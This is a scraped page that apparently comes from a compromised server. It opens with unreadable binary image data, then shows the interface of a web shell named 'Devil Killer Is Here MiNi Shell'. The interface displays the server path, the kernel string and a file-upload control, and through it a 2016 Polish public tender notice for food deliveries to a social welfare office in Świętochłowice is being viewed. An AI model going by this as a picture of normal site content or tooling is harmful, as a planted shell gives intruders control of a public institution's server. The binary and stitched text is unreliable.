JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160926/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160926/313233-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 313233 - 2016
              z dnia 2016-09-26 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Świętochłowice: DOSTAWA ARTYKUŁÓW ŻYWNOŚCIOWYCH DLA OŚRODKA POMOCY SPOŁECZNEJ
 W ŚWIĘTOCHŁOWICACH W PODZIALE NA DWA PAKIETY :
- MIĘSO I PRZETWORY MIĘSNE,
- PIECZYWO  I WYROBY PIEKARNICZE
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br />nie dotyczy</div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b>nie dotyczy<br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b>nie dotyczy<br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Ośrodek Pomocy Społecznej, krajowy numer identyfikacyjny
              345206200000, ul.
              ul. Katowicka 
              35,
              41600  
              Świętochłowice, woj.
              śląskie, państwo
              , tel.
              322 455 104, e-mail
              organizacyjnoprawny@ops.internetdsl.pl, faks
              322 455 104.
              <br />
              Adres strony internetowej (URL): www.ops.swietochlowice.info<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: pomoc społeczna </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br />nie dotyczy</div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.ops.swietochlowice.info</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.ops.swietochlowice.info</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pocztą, kurierem<br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br />41-600 Świętochłowice, ul. Katowicka 35</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>DOSTAWA ARTYKUŁÓW ŻYWNOŚCIOWYCH DLA OŚRODKA POMOCY SPOŁECZNEJ
 W ŚWIĘTOCHŁOWICACH W PODZIALE NA DWA PAKIETY :
- MIĘSO I PRZETWORY MIĘSNE,
- PIECZYWO  I WYROBY PIEKARNICZE
<br /><b>Numer referencyjny: </b>3201-04/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b><br />zadanie 1, zadanie 2<br /><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Przedmiotem zamówienia jest dostawa artykułów żywnościowych dla Ośrodka Pomocy Społecznej w Świętochłowicach, w podziale na 2 pakiety, tj.: mięsa i przetworów mięsnych oraz  pieczywa i wyrobów piekarniczych wraz z wniesieniem i rozładunkiem  w  magazynach Dziennego Domu Senior- WIGOR przy ul. Imieli 12 oraz ul. Katowickiej 35 w Świętochłowicach.
2.	Przykładowy asortyment przedmiotu zamówienia określa załącznik nr 2 do niniejszej SIWZ  tabela artykułów w zakresie każdego z 2 pakietów. Ilości artykułów podane w tabelach
posiadają wartość szacunkową i będą uzależnione od aktualnych potrzeb Zamawiającego.
3.	Dostawy realizowane będą na podstawie zamówienia pisemnego przesyłanego faksem lub składanego telefonicznie w każdym następnym dniu po zgłoszeniu zamówienia lub
w innym terminie uzgodnionym z Zamawiającym, w dni powszednie codziennie od
poniedziałku do soboty w  godzinach od 07:00 do 10:00. 
4.	Wykonawca zobowiązany będzie do: bezpłatnego dowozu towaru transportem spełniającym wymagania sanitarne, należytego zabezpieczenia towaru na czas przewozu (opakowania, pojemniki przystosowane do przewozu danego asortymentu), wniesienia wraz z rozładunkiem w magazynie określonym w ust. 1 niniejszego paragrafu, i weźmie na siebie całkowitą odpowiedzialność za towar do momentu jego odbioru w magazynie Zamawiającego  oraz  poniesie z tego tytułu wszelkie skutki prawne.
5.	Wykonawca zobowiązany będzie dostarczać zamawiany towar bezwzględnie w dni oraz
w godzinach wyznaczonych przez Zamawiającego.
6.	Wykonawca zobowiązany będzie dostarczyć towar I klasy jakości, świeży, z okresami ważności
odpowiednimi dla danego asortymentu, wysokiej jakości sensorycznej i mikrobiologicznej.
<br /><br /><b>II.5) Główny kod CPV: </b>15100000-9<br /><b> Dodatkowe kody CPV:</b>15810000-9<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              202291.72<br />
              Waluta:
              <br /><div style="padding-left: 20px">pln<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 01/12/2016<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Zamawiający przewiduje  możliwość  składania ofert częściowych 
Zamawiający  nie przewiduje możliwości udzielania zamówień uzupełniających
Zamawiający  nie przewiduje  możliwości składania ofert wariantowych 
Zamawiający nie przewiduje aukcji elektronicznej
Zamawiający nie przewiduje zawarcia  umowy ramowej
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                nie dotyczy<br />
                Informacje dodatkowe
                nie dotyczy<br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                nie dotyczy<br />
                Informacje dodatkowe
                nie dotyczy<br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                nie dotyczy<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                nie dotyczy</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">a)	w formie oryginału lub kopii potwierdzonej za zgodność z oryginałem, odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,  zgodnie z art. 24 ust. 5 pkt 1 Pzp,
b)	w okolicznościach, o których mowa w art. 24 ust. 1 pkt 23 Pzp, Wykonawca winien złożyć oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej - wg wzoru stanowiącego załącznik nr 5 do SIWZ.
W przypadku wskazania przez Wykonawcę dostępności oświadczeń lub dokumentów w formie elektronicznej pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający pobiera samodzielnie z tych baz  danych wskazane przez Wykonawcę oświadczenia lub dokumenty.
Niezwłocznie po otwarciu ofert Zamawiający zamieści na stronie internetowej informacje dotyczące :
	- kwoty, jaką zamierza przeznaczyć na sfinansowanie zamówienia,
	- firm oraz adresów Wykonawców , którzy złożyli oferty,
	- ceny, terminu wykonania zamówienia, warunków płatności.
Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa powyżej, przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej( załącznik nr 5 do SIWZ). Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenia zamówienia.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Oświadczenie o	spełnianiu warunków udziału w postępowaniu  wg wzoru stanowiącego załącznik nr 4 do SIWZ.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br />nie dotyczy</div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">nie dotyczy</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Wraz z ofertą Wykonawca winien również złożyć  zestaw próbek następujących artykułów:
1) dla zadania mięso i przetwory mięsne :
-  metka tradycyjna  ok. 200g,
-  kiełbasa śląska  ok. 200 g,
-  parówka gruba  ok. 200 g,
-  parówka drobiowa  ok. 200 g,
-  pasztetowa wędzona  ok. 200 g,
-  salceson ozorkowy  ok. 200 g,
-  szynka gotowana  ok. -200 g.
2) dla zadania pieczywo i wyroby piekarnicze :
       -   bułka pszenna duża 100g  1 sztuka,
       -   bułka mleczna 80g  1 sztuka,
       -   chleb mieszany 1000g  1 sztuka,
       -   pączek z nadzieniem 80 g- 1 sztuka,
       -   drożdżówka 80g  1 sztuka.
(Zamawiający zwróci koszty próbek dostarczonych produktów niezbędnych do oceny jakości
w postaci zapłaty rachunku lub faktury VAT, wystawionej według cen jednostkowych zawartych
w ofercie, lub średnich cen powszechnie obowiązujących na rynku).
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br />nie dotyczy </div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br />nie dotyczy</div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br />nie dotyczy<br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br />nie dotyczy<br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b>nie dotyczy<br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              nie dotyczy<br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              nie dotyczy<br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              nie dotyczy<br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              nie dotyczy<br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              nie dotyczy<br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br />nie dotyczy</div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>jakość</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br />nie dotyczy<br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br />nie dotyczy<br />
              Informacje dodatkowe
              <br />nie dotyczy<br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br />nie dotyczy<br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br />nie dotyczy<br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br />nie dotyczy<br /><br />
              Informacje dodatkowe:
              <br />nie dotyczy<br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br />nie dotyczy<br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br />nie dotyczy<br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px">nie dotyczy</div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px">nie dotyczy</div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px">nie dotyczy</div><br />
              Informacje dodatkowe:
